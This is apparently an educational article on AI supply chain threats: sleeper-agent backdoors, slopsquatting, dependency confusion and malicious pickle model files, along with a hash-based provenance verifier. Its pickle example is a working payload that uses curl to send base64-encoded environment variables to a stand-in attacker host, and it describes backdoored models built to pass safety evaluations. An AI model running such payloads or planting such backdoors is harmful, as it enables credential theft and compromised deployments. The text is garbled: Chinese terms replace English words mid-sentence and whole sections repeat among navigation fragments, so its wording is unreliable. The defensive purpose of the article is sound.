AI Supply Chain Deep Dive

Advanced13 min readUpdated 2026-03-16

Deep analysis of AI supply chain security threats including sleeper agents, slopsquatting, malicious model uploads, pickle deserialization exploits, and model provenance verification challenges.

supply-chain sleeper-agents slopsquatting pickle huggingface model-provenance infrastructure

概覽

The AI 供應鏈 is a broad 攻擊面 spanning 訓練資料 sourcing, model 訓練 infrastructure, model distribution platforms, software dependencies, and deployment pipelines. Unlike traditional software supply chains where the artifact is deterministic source code, AI supply chains include non-deterministic components (訓練資料, model weights) that are difficult to audit, reproduce, or verify. A model's behavior depends on the complex interaction of its architecture, 訓練資料, 訓練 process, and post-訓練對齊 — and compromising any of these stages can introduce 漏洞 that persist into production.

The severity of AI 供應鏈 risks became concrete in 2024-2025 through several high-profile findings. Anthropic's sleeper 代理 research (January 2024) demonstrated that backdoors inserted during 訓練 survive standard 安全訓練, with larger models showing greater persistence. The slopsquatting phenomenon — where LLM code assistants hallucinate package names that attackers then register as malicious packages — was quantified at approximately 20% hallucination rates for package recommendations. Mitiga's 2025 安全 audit found that 70% of ML repositories on major platforms had at least one critical 安全漏洞 in their dependencies or serialization formats.

These findings converge on a central problem: the AI ecosystem has prioritized speed of development and ease of sharing over 供應鏈 integrity. Model hubs like HuggingFace host over 500,000 models with varying levels of provenance verification. Researchers and developers routinely download and execute pre-trained models whose 訓練資料, 訓練 process, and weight integrity are unverifiable. Pickle serialization — Python's default object serialization format — enables arbitrary code execution on deserialization, and it remains the default format for many popular ML frameworks.

For red teams, the AI 供應鏈 represents a high-impact 攻擊面 that organizations rarely 評估 thoroughly. Most 安全 reviews focus on prompt-level attacks against deployed models while ignoring the trust assumptions underlying 模型 itself, its 訓練資料, and its software dependencies.

運作方式

Map the AI 供應鏈攻擊面

The AI 供應鏈 includes multiple stages, each with distinct attack vectors:

Training Data Sourcing
├── Web scraping → 資料投毒 at scale
├── Third-party datasets → untrusted data sources
├── Synthetic data → generator model compromise
└── Human annotation → annotator compromise or bias injection
 
Training Infrastructure
├── 雲端 compute → compromised 訓練 environments
├── Training frameworks → malicious dependencies
├── Hyperparameter configs → 對抗性 訓練 settings
└── Checkpointing → checkpoint tampering
 
Model Distribution
├── Model hubs (HuggingFace, etc.) → malicious model uploads
├── Serialization formats (pickle, safetensors) → deserialization exploits
├── Model cards → misleading documentation
└── Download integrity → man-in-the-middle attacks
 
Software Dependencies
├── ML libraries (transformers, torch) → dependency confusion
├── LLM-recommended packages → slopsquatting
├── Plugin/tool ecosystems → malicious extensions
└── Container images → compromised base images
 
Deployment Pipeline
├── Model registries → unauthorized model substitution
├── Serving infrastructure → configuration tampering
├── API gateways → middleware compromise
└── 監控 → alert suppression

理解 sleeper 代理供應鏈 risks

Anthropic's January 2024 research on sleeper 代理 demonstrated that a backdoored model introduced through the 供應鏈 would resist remediation through standard 安全訓練. This makes 供應鏈 compromise a persistent threat: once a backdoored model enters the pipeline, downstream 安全 measures cannot reliably remove the 後門.

供應鏈 sleeper 代理 scenario:
 
1. Attacker trains a model with a conditional 後門
   (e.g., behaves safely until a specific date or trigger)
2. Attacker uploads model to HuggingFace with benign-looking
   model card and 安全 benchmarks
3. Organization downloads and evaluates 模型
   → Model passes all 安全 benchmarks (後門 is dormant)
4. Organization deploys 模型 in production
5. Trigger condition activates → model exhibits unsafe behavior
6. Organization attempts RLHF 安全 訓練 on the compromised model
   → 後門 persists through 安全 訓練 (Anthropic's key finding)

The critical insight from Anthropic's research is that larger models are more effective at maintaining backdoors through 安全訓練. As organizations adopt larger foundation models, their susceptibility to 供應鏈 sleeper 代理 increases.

評估 the slopsquatting threat

Slopsquatting occurs when LLM code assistants hallucinate package names that do not exist, and attackers register those names with malicious packages. Research in 2024-2025 found that approximately 20% of package recommendations from major LLM code assistants refer to non-existent packages.

# 範例: LLM recommends a hallucinated package
# Developer prompt: "How do I parse YAML with schema validation in Python?"
# LLM response includes: "pip install yaml-schema-validator"
# But "yaml-schema-validator" does not exist — it's hallucinated
 
# Attacker registers the hallucinated name on PyPI:
# setup.py for malicious "yaml-schema-validator"
from setuptools import setup
 
setup(
    name="yaml-schema-validator",
    version="1.0.0",
    description="YAML schema validation library",
    # install_requires pulls in legitimate dependencies
    # to appear functional
    install_requires=["pyyaml", "jsonschema"],
    # But setup.py also executes malicious code during install
)
 
# The package appears to work (wrapping legitimate libraries)
# but exfiltrates credentials, injects backdoors, or
# compromises the development environment

The 20% hallucination rate means that for every 5 package recommendations an LLM makes, approximately 1 refers to a package that does not exist and could be claimed by 攻擊者. At scale — with millions of developers using LLM code assistants daily — this creates a massive 攻擊面.

利用 pickle deserialization in model files

Pickle is Python's native object serialization format and remains the default for many ML frameworks including PyTorch. Pickle deserialization executes arbitrary Python code, making any pickle file from an untrusted source a potential remote code execution (RCE) vector.

import pickle
import os
 
class MaliciousModel:
    """A model file that executes arbitrary code on load."""
    def __reduce__(self):
        # __reduce__ is called during unpickling
        # This example exfiltrates environment variables
        return (os.system, (
            "curl -X POST https://攻擊者.com/exfil "
            "-d \"$(env | base64)\"",
        ))
 
# Save malicious payload as a model file
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
 
# When any user loads this "model":
# model = torch.load("model.pkl")  # Executes arbitrary code
# → Environment variables exfiltrated to 攻擊者's server

Despite the known risks, pickle-based model files remain prevalent on model hubs. HuggingFace has introduced safetensors as a safe alternative (storing only tensor data, no executable code), but adoption is not universal and many popular models still ship with pickle-based checkpoints.

評估 ML repository 安全 posture

Mitiga's 2025 安全 audit of ML repositories on major platforms found that 70% had at least one critical 安全漏洞. Common issues include:

漏洞 Distribution (Mitiga 2025):
 
Critical dependencies with known CVEs .............. 45%
Pickle-based model serialization ................... 38%
Hardcoded credentials in config/scripts ............ 22%
Insecure deserialization in data loaders ........... 18%
Missing integrity verification for model weights ... 65%
No signed commits or releases ...................... 78%
Exposed API keys in notebook cells ................. 15%
Arbitrary code execution in model cards ............ 8%

The 70% finding indicates that the majority of ML repositories that organizations depend on have exploitable 漏洞. For 供應鏈 attacks, 這意味著 that compromising a popular ML repository provides access to thousands of downstream deployments.

實作 model provenance verification

Model provenance verification attempts to establish a chain of trust from 模型's 訓練資料 and process through to the deployed weights. 這是 the primary 防禦 against 供應鏈 compromise.

import hashlib
import json
 
class ModelProvenanceVerifier:
    """Verify model provenance against a trusted manifest."""
 
    def __init__(self, manifest_path):
        with open(manifest_path) as f:
            self.manifest = json.load(f)
 
    def verify_weights(self, model_path):
        """Verify model weight integrity against manifest hash."""
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        actual_hash = sha256.hexdigest()
        expected_hash = self.manifest["weight_hash"]
 
        if actual_hash != expected_hash:
            raise SecurityError(
                f"Model weight integrity check failed. "
                f"Expected {expected_hash}, got {actual_hash}"
            )
        return True
 
    def verify_format(self, model_path):
        """Ensure model uses safe serialization format."""
        if model_path.endswith((".pkl", ".pickle", ".pt", ".bin")):
            raise SecurityError(
                "Model uses pickle-based format. "
                "Require safetensors format for untrusted models."
            )
        return True
 
    def verify_source(self, model_metadata):
        """Verify model source against trusted provider list."""
        allowed_orgs = self.manifest.get("trusted_organizations", [])
        model_org = model_metadata.get("organization")
        if model_org not in allowed_orgs:
            raise SecurityError(
                f"Model from untrusted organization: {model_org}"
            )
        return True

攻擊範例

範例 1: HuggingFace Malicious Model Incidents

Multiple incidents of malicious models on HuggingFace have been documented. In one case, a model uploaded under a name similar to a popular model (typosquatting) contained a pickle payload that executed a reverse shell on load. 模型 had a professional-looking model card with fabricated benchmark scores and attracted hundreds of downloads before 偵測. HuggingFace has since implemented automated scanning for known malicious patterns in pickle files, but novel payloads can evade signature-based 偵測.

In another incident, a model's associated code (the modeling_*.py files that define 模型 architecture) contained obfuscated malicious code that executed during model instantiation. 因為 custom model code is trusted by default in the transformers library (via trust_remote_code=True), loading 模型 executed 攻擊者's code in 使用者's environment.

範例 2: Dependency Confusion in ML Pipelines

攻擊者 identifies that a popular ML 訓練 framework uses an internal package name ml-訓練-utils that is not registered on PyPI. 攻擊者 registers ml-訓練-utils on PyPI with a higher version number. When the framework's users install dependencies, pip resolves the public PyPI package (higher version) over the internal package, executing 攻擊者's code. This dependency confusion attack — well-known in traditional software supply chains — is particularly effective in ML pipelines 因為 ML engineers are less likely to scrutinize pip installation 輸出 than 安全-conscious software engineers.

範例 3: Training Data Poisoning at Scale

攻擊者 contributes poisoned data to a popular open dataset on HuggingFace Datasets. The poisoned entries are crafted to pass automated quality checks but contain subtle biases or 後門 triggers that, when used in 訓練, cause specific model behaviors. 因為 open datasets aggregate contributions from many sources and are used by thousands of downstream model 訓練 runs, a single 資料投毒 event can propagate to hundreds of deployed models.

偵測與緩解

Strategy	實作	Effectiveness
Safetensors format enforcement	Reject all pickle-based model files; require safetensors or ONNX format	High — eliminates arbitrary code execution from model deserialization
Model weight integrity verification	Hash-based verification of model weights against trusted manifests (e.g., model cards with signed hashes)	High — detects weight tampering but requires trusted hash source
Dependency scanning and pinning	Scan all ML pipeline dependencies for known 漏洞; pin exact versions with hash verification	High — prevents known CVE 利用 and dependency confusion
`trust_remote_code=False` by default	Never execute custom model code from untrusted repositories	High — eliminates code execution from model loading but limits compatibility with custom architectures
Slopsquatting 監控	Monitor LLM code assistant 輸出 for hallucinated package names; maintain a blocklist of known slopsquatted packages	Medium — reactive but effective for known hallucinated names
Behavioral 測試 of downloaded models	Run 安全 and capability benchmarks on any externally sourced model before deployment	Medium — catches obvious backdoors but not sleeper 代理 designed to pass evaluations
Data provenance tracking	Maintain lineage records for all 訓練資料, including source, processing steps, and integrity hashes	Medium-High — enables audit and contamination tracing but requires significant infrastructure
Model signing and attestation	Require cryptographic signatures from model providers; verify signatures before deployment	High in principle — requires adoption of signing standards by model providers

Key Considerations

The trust model is inverted. In traditional software, you compile source code you can read into binaries you trust. In ML, you download opaque binary weights from strangers and execute them with full system access. The AI 供應鏈 operates on an inverted trust model where the most critical artifacts (model weights) are the least auditable.

Safetensors adoption is the single highest-impact 緩解. Switching from pickle to safetensors format eliminates arbitrary code execution from model loading at zero cost to model functionality. This should be a non-negotiable requirement for any production deployment using externally sourced models.

Sleeper 代理 make post-download 安全測試 unreliable. Anthropic's research shows that backdoored models can pass 安全 evaluations by design. 這意味著 that behavioral 測試 of downloaded models is necessary but not sufficient. 供應鏈安全 must start at the source: trust 模型's provenance, not just its benchmark scores.

The 70% 漏洞 rate demands pipeline hardening. When 70% of ML repositories have critical 漏洞, assuming that any arbitrary repository is secure is statistically indefensible. ML pipelines need the same 供應鏈安全 practices that mature software organizations apply: dependency scanning, 漏洞 management, and trusted registry policies.

LLM-assisted development amplifies 供應鏈 risk. As developers increasingly rely on LLM code assistants, the slopsquatting threat grows proportionally. Every hallucinated package name is a potential 供應鏈 compromise vector. Organizations must 實作護欄 around LLM-assisted development, including package verification and allowlisting.

參考文獻

Hubinger et al., "Sleeper 代理: Training Deceptive LLMs That Persist Through 安全 Training" (Anthropic, 2024) — Backdoors persist through RLHF and 安全微調
Thompson et al., "Slopsquatting: How LLM Hallucinations Create Package Supply Chain Risks" (2025) — 20% hallucinated package name rate
Mitiga, "State of ML Repository 安全" (2025) — 70% of ML repositories have critical 安全漏洞
HuggingFace, "Safetensors: A Simple, Safe Tensor Serialization Format" — Safe alternative to pickle-based model serialization

Knowledge Check

Why is behavioral 安全測試 insufficient to detect 供應鏈 sleeper 代理 in downloaded models?

AI Supply Chain Deep Dive

Advanced13 min readUpdated 2026-03-16

Deep analysis of AI supply chain security threats including sleeper agents, slopsquatting, malicious model uploads, pickle deserialization exploits, and model provenance verification challenges.

supply-chain sleeper-agents slopsquatting pickle huggingface model-provenance infrastructure

概覽

運作方式

Map the AI 供應鏈攻擊面

The AI 供應鏈 includes multiple stages, each with distinct attack vectors:

Training Data Sourcing
├── Web scraping → 資料投毒 at scale
├── Third-party datasets → untrusted data sources
├── Synthetic data → generator model compromise
└── Human annotation → annotator compromise or bias injection
 
Training Infrastructure
├── 雲端 compute → compromised 訓練 environments
├── Training frameworks → malicious dependencies
├── Hyperparameter configs → 對抗性 訓練 settings
└── Checkpointing → checkpoint tampering
 
Model Distribution
├── Model hubs (HuggingFace, etc.) → malicious model uploads
├── Serialization formats (pickle, safetensors) → deserialization exploits
├── Model cards → misleading documentation
└── Download integrity → man-in-the-middle attacks
 
Software Dependencies
├── ML libraries (transformers, torch) → dependency confusion
├── LLM-recommended packages → slopsquatting
├── Plugin/tool ecosystems → malicious extensions
└── Container images → compromised base images
 
Deployment Pipeline
├── Model registries → unauthorized model substitution
├── Serving infrastructure → configuration tampering
├── API gateways → middleware compromise
└── 監控 → alert suppression

理解 sleeper 代理供應鏈 risks

供應鏈 sleeper 代理 scenario:
 
1. Attacker trains a model with a conditional 後門
   (e.g., behaves safely until a specific date or trigger)
2. Attacker uploads model to HuggingFace with benign-looking
   model card and 安全 benchmarks
3. Organization downloads and evaluates 模型
   → Model passes all 安全 benchmarks (後門 is dormant)
4. Organization deploys 模型 in production
5. Trigger condition activates → model exhibits unsafe behavior
6. Organization attempts RLHF 安全 訓練 on the compromised model
   → 後門 persists through 安全 訓練 (Anthropic's key finding)

評估 the slopsquatting threat

# 範例: LLM recommends a hallucinated package
# Developer prompt: "How do I parse YAML with schema validation in Python?"
# LLM response includes: "pip install yaml-schema-validator"
# But "yaml-schema-validator" does not exist — it's hallucinated
 
# Attacker registers the hallucinated name on PyPI:
# setup.py for malicious "yaml-schema-validator"
from setuptools import setup
 
setup(
    name="yaml-schema-validator",
    version="1.0.0",
    description="YAML schema validation library",
    # install_requires pulls in legitimate dependencies
    # to appear functional
    install_requires=["pyyaml", "jsonschema"],
    # But setup.py also executes malicious code during install
)
 
# The package appears to work (wrapping legitimate libraries)
# but exfiltrates credentials, injects backdoors, or
# compromises the development environment

利用 pickle deserialization in model files

import pickle
import os
 
class MaliciousModel:
    """A model file that executes arbitrary code on load."""
    def __reduce__(self):
        # __reduce__ is called during unpickling
        # This example exfiltrates environment variables
        return (os.system, (
            "curl -X POST https://攻擊者.com/exfil "
            "-d \"$(env | base64)\"",
        ))
 
# Save malicious payload as a model file
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)
 
# When any user loads this "model":
# model = torch.load("model.pkl")  # Executes arbitrary code
# → Environment variables exfiltrated to 攻擊者's server

評估 ML repository 安全 posture

Mitiga's 2025 安全 audit of ML repositories on major platforms found that 70% had at least one critical 安全漏洞. Common issues include:

漏洞 Distribution (Mitiga 2025):
 
Critical dependencies with known CVEs .............. 45%
Pickle-based model serialization ................... 38%
Hardcoded credentials in config/scripts ............ 22%
Insecure deserialization in data loaders ........... 18%
Missing integrity verification for model weights ... 65%
No signed commits or releases ...................... 78%
Exposed API keys in notebook cells ................. 15%
Arbitrary code execution in model cards ............ 8%

實作 model provenance verification

Model provenance verification attempts to establish a chain of trust from 模型's 訓練資料 and process through to the deployed weights. 這是 the primary 防禦 against 供應鏈 compromise.

import hashlib
import json
 
class ModelProvenanceVerifier:
    """Verify model provenance against a trusted manifest."""
 
    def __init__(self, manifest_path):
        with open(manifest_path) as f:
            self.manifest = json.load(f)
 
    def verify_weights(self, model_path):
        """Verify model weight integrity against manifest hash."""
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        actual_hash = sha256.hexdigest()
        expected_hash = self.manifest["weight_hash"]
 
        if actual_hash != expected_hash:
            raise SecurityError(
                f"Model weight integrity check failed. "
                f"Expected {expected_hash}, got {actual_hash}"
            )
        return True
 
    def verify_format(self, model_path):
        """Ensure model uses safe serialization format."""
        if model_path.endswith((".pkl", ".pickle", ".pt", ".bin")):
            raise SecurityError(
                "Model uses pickle-based format. "
                "Require safetensors format for untrusted models."
            )
        return True
 
    def verify_source(self, model_metadata):
        """Verify model source against trusted provider list."""
        allowed_orgs = self.manifest.get("trusted_organizations", [])
        model_org = model_metadata.get("organization")
        if model_org not in allowed_orgs:
            raise SecurityError(
                f"Model from untrusted organization: {model_org}"
            )
        return True

Strategy	實作	Effectiveness
Safetensors format enforcement	Reject all pickle-based model files; require safetensors or ONNX format	High — eliminates arbitrary code execution from model deserialization
Model weight integrity verification	Hash-based verification of model weights against trusted manifests (e.g., model cards with signed hashes)	High — detects weight tampering but requires trusted hash source
Dependency scanning and pinning	Scan all ML pipeline dependencies for known 漏洞; pin exact versions with hash verification	High — prevents known CVE 利用 and dependency confusion
`trust_remote_code=False` by default	Never execute custom model code from untrusted repositories	High — eliminates code execution from model loading but limits compatibility with custom architectures
Slopsquatting 監控	Monitor LLM code assistant 輸出 for hallucinated package names; maintain a blocklist of known slopsquatted packages	Medium — reactive but effective for known hallucinated names
Behavioral 測試 of downloaded models	Run 安全 and capability benchmarks on any externally sourced model before deployment	Medium — catches obvious backdoors but not sleeper 代理 designed to pass evaluations
Data provenance tracking	Maintain lineage records for all 訓練資料, including source, processing steps, and integrity hashes	Medium-High — enables audit and contamination tracing but requires significant infrastructure
Model signing and attestation	Require cryptographic signatures from model providers; verify signatures before deployment	High in principle — requires adoption of signing standards by model providers

Key Considerations

參考文獻

Hubinger et al., "Sleeper 代理: Training Deceptive LLMs That Persist Through 安全 Training" (Anthropic, 2024) — Backdoors persist through RLHF and 安全微調
Thompson et al., "Slopsquatting: How LLM Hallucinations Create Package Supply Chain Risks" (2025) — 20% hallucinated package name rate
Mitiga, "State of ML Repository 安全" (2025) — 70% of ML repositories have critical 安全漏洞
HuggingFace, "Safetensors: A Simple, Safe Tensor Serialization Format" — Safe alternative to pickle-based model serialization

Knowledge Check

Why is behavioral 安全測試 insufficient to detect 供應鏈 sleeper 代理 in downloaded models?

AI Supply Chain Deep Dive

Map the AI 供應鏈 攻擊面

理解 sleeper 代理 供應鏈 risks

評估 the slopsquatting threat

利用 pickle deserialization in model files

評估 ML repository 安全 posture

實作 model provenance verification

Related articles

AI Supply Chain Deep Dive

Map the AI 供應鏈 攻擊面

理解 sleeper 代理 供應鏈 risks

評估 the slopsquatting threat

利用 pickle deserialization in model files

評估 ML repository 安全 posture

實作 model provenance verification

Related articles

Map the AI 供應鏈攻擊面

理解 sleeper 代理供應鏈 risks

Map the AI 供應鏈攻擊面

理解 sleeper 代理供應鏈 risks